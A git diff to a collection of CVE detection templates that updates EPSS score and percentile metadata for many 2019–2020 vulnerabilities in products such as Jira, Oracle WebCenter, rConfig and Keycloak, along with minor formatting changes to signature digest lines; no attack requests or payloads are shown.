cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 11c9f4d009..ab8701aad2 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.69009 - epss-percentile: 0.97629 + epss-percentile: 0.97631 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index c72ba09d38..97ef3b8d45 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46743 + epss-percentile: 0.46753 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 1c1255b9dd..b4e77f3dbb 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20183 cwe-id: CWE-434 epss-score: 0.0192 - epss-percentile: 0.87294 + epss-percentile: 0.87299 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 9a285cb64e..5d8f1a93bb 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-20210 cwe-id: CWE-79 epss-score: 0.00822 - epss-percentile: 0.79998 + epss-percentile: 0.8001 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 51ac668f47..4fd169ea4a 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-20224 cwe-id: CWE-78 epss-score: 0.2078 - epss-percentile: 0.95833 + epss-percentile: 0.95835 cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index bb8e3ff865..682668af69 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20933 cwe-id: CWE-287 epss-score: 0.03713 - epss-percentile: 0.90727 + epss-percentile: 0.90733 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index a8330ee407..5fa4674da6 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.6 cve-id: CVE-2019-2578 epss-score: 0.01062 - epss-percentile: 0.8254 + epss-percentile: 0.82552 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index d6143ed59b..48f4a1dd50 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -17,7 +17,7 @@ info: cvss-score: 4.3 cve-id: CVE-2019-2579 epss-score: 0.00493 - epss-percentile: 0.73528 + epss-percentile: 0.73556 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index 651543b38c..d8dda2aba8 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -16,7 +16,7 @@ info: cvss-score: 4.9 cve-id: CVE-2019-2588 epss-score: 0.08827 - epss-percentile: 0.93864 + epss-percentile: 0.93869 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index b160dfbda9..d3504f8dff 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-2729 cwe-id: CWE-284 epss-score: 0.97067 - epss-percentile: 0.99683 + epss-percentile: 0.99684 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 851e0de855..450239535d 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2019-3401 cwe-id: CWE-863 epss-score: 0.0055 - epss-percentile: 0.74946 + epss-percentile: 0.74969 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 654a8e53e2..f44af7905d 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.00254 - epss-percentile: 0.62988 + epss-percentile: 0.63016 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 8724b09e28..e7d47ae2a0 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-3403 cwe-id: CWE-863 epss-score: 0.0055 - epss-percentile: 0.74946 + epss-percentile: 0.74969 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 5dc3026a03..747cbf9d8d 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.0237 - epss-percentile: 0.88647 + epss-score: 0.01966 + epss-percentile: 0.8745 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 7693dc1c4b..dfc2d1872b 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.57172 + epss-percentile: 0.572 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 69ba083896..835e5306da 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-3912 cwe-id: CWE-601 epss-score: 0.0016 - epss-percentile: 0.52416 + epss-percentile: 0.52442 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 71a78b387f..c56994ce66 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-3929 cwe-id: CWE-78,CWE-79 epss-score: 0.97419 - epss-percentile: 0.99908 + epss-percentile: 0.99909 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220389ca415534a33165b49f129f90c1ef86f8baf7394698c224140626a1fe3dbc902207ab3b9bf404a23634f65b0240f5b80cb95cf437c1fd9fe16d665ed109e293eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220389ca415534a33165b49f129f90c1ef86f8baf7394698c224140626a1fe3dbc902207ab3b9bf404a23634f65b0240f5b80cb95cf437c1fd9fe16d665ed109e293eb7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index a73fdb1d0c..a4ac10e354 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-5434 cwe-id: CWE-502 epss-score: 0.28703 - epss-percentile: 0.9633 + epss-percentile: 0.96333 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 00d8da6abe..68375860b5 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46913 + epss-percentile: 0.46925 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 0774043e31..6cbc1cb2bd 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-6340 cwe-id: CWE-502 epss-score: 0.97484 - epss-percentile: 0.99965 + epss-percentile: 0.99964 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 0c4c8a77f0..b642fbdb2e 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.23312 - epss-percentile: 0.96017 + epss-percentile: 0.96021 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 03df1cd985..e63ebc0390 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.9 cve-id: CVE-2019-6799 epss-score: 0.13969 - epss-percentile: 0.95044 + epss-percentile: 0.95048 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 6862994fbc..8ee93d5eee 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-6802 cwe-id: CWE-74 epss-score: 0.00113 - epss-percentile: 0.44579 + epss-percentile: 0.44601 cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index d1572b7205..6bdcc26aa0 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96645 - epss-percentile: 0.99506 + epss-percentile: 0.99507 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index a356ac32d9..819c918941 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.445 + epss-percentile: 0.44522 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index ea1be91d5f..807d19f1c8 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.97478 - epss-percentile: 0.99963 + epss-percentile: 0.99962 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 54ac07d604..4a7741a270 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7254 cwe-id: CWE-22 epss-score: 0.85014 - epss-percentile: 0.98161 + epss-percentile: 0.98163 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 5435ed6fc5..d7500ca428 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7255 cwe-id: CWE-79 epss-score: 0.01544 - epss-percentile: 0.85704 + epss-percentile: 0.85709 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index e5d7e97b03..2fd1f5d862 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7275 cwe-id: CWE-601 epss-score: 0.00483 - epss-percentile: 0.73245 + epss-percentile: 0.73275 cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index bb0f164bf4..da9b86b8e5 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-7315 cwe-id: CWE-22 epss-score: 0.0138 - epss-percentile: 0.84877 + epss-percentile: 0.84884 cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 514a83abcb..85c33d555e 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.88397 - epss-percentile: 0.98347 + epss-percentile: 0.98349 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 885fc04b30..09abe373ce 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44579 + epss-percentile: 0.44601 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 74e5a5bbec..57e0f523eb 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7609 cwe-id: CWE-94 epss-score: 0.96365 - epss-percentile: 0.994 + epss-percentile: 0.99401 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index be0d804b70..aaa1e398bf 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.14515 - epss-percentile: 0.95131 + epss-percentile: 0.95134 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 8e0b22669f..e4d362f5bf 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.0161 - epss-percentile: 0.86039 + epss-percentile: 0.86044 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 3dc41b752e..eba060dcd2 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.97131 - epss-percentile: 0.99716 + epss-percentile: 0.99717 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 24cd2efe81..f0bb0fc4d4 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.15691 - epss-percentile: 0.9532 + epss-percentile: 0.95319 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index e0e280e95c..7dc3c05e31 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-8449 cwe-id: CWE-306 epss-score: 0.24444 - epss-percentile: 0.96087 + epss-percentile: 0.96089 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index de5a12174d..50683e849b 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-8903 cwe-id: CWE-22 epss-score: 0.01071 - epss-percentile: 0.82615 + epss-percentile: 0.82628 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index c0fb358409..85d986c6a7 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.00921 - epss-percentile: 0.81179 + epss-percentile: 0.81191 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 631ab98630..00b01b0fbb 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-8982 cwe-id: CWE-918 epss-score: 0.02146 - epss-percentile: 0.88057 + epss-percentile: 0.88062 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 56b933a8b9..1ef6fda1bb 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-9041 cwe-id: CWE-917 epss-score: 0.01591 - epss-percentile: 0.85938 + epss-percentile: 0.85943 cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 2a5576acf0..935a0888cd 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9618 cwe-id: CWE-22 epss-score: 0.0643 - epss-percentile: 0.92903 + epss-percentile: 0.92907 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index b3b2a8df9b..3053fad1c0 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.02964 - epss-percentile: 0.89754 + epss-percentile: 0.8976 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index f3b248026d..21e38ccff7 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9733 epss-score: 0.89953 - epss-percentile: 0.9844 + epss-percentile: 0.98441 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 90d11a4ba8..2a62b32c21 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.00123 - epss-percentile: 0.46372 + epss-percentile: 0.46383 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index d16236e6b7..2b4e4e135b 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-9922 cwe-id: CWE-22 epss-score: 0.01088 - epss-percentile: 0.82755 + epss-percentile: 0.82767 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index f37ee10d1d..add17b2ed4 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9955 cwe-id: CWE-79 epss-score: 0.11865 - epss-percentile: 0.94716 + epss-percentile: 0.94718 cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 07609a7625..aa3f778618 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -55,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022004093b04bee0bc5ac5612c67d2acaa22fc35e4de359d4981cce17f9a1cfcefcf02210096a0cf90e695791c606aa16b6080f642d6470bfead24b0d6c36b5a5b92a6c190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022004093b04bee0bc5ac5612c67d2acaa22fc35e4de359d4981cce17f9a1cfcefcf02210096a0cf90e695791c606aa16b6080f642d6470bfead24b0d6c36b5a5b92a6c190:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 6ba3c16aed..e405d53981 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-10199 cwe-id: CWE-917 epss-score: 0.97385 - epss-percentile: 0.99887 + epss-percentile: 0.99888 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 1732e60261..cd488f7068 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-10220 cwe-id: CWE-89 epss-score: 0.02204 - epss-percentile: 0.88231 + epss-percentile: 0.88237 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 225ab66f3f..df8c94d35f 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-10546 cwe-id: CWE-89 epss-score: 0.45053 - epss-percentile: 0.96993 + epss-percentile: 0.96999 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 6633fab234..c4d1a505fa 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-10547 cwe-id: CWE-89 epss-score: 0.45053 - epss-percentile: 0.96993 + epss-percentile: 0.96999 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 3e6cdf314d..f9e4a7f9bb 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-10548 cwe-id: CWE-89 epss-score: 0.45053 - epss-percentile: 0.96993 + epss-percentile: 0.96999 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index c6d83ae2be..cafcba925d 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-10549 cwe-id: CWE-89 epss-score: 0.45053 - epss-percentile: 0.96993 + epss-percentile: 0.96999 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index ac8c43fcd4..c9deea31fa 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-10770 cwe-id: CWE-918 epss-score: 0.43882 - epss-percentile: 0.96956 + epss-percentile: 0.96962 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 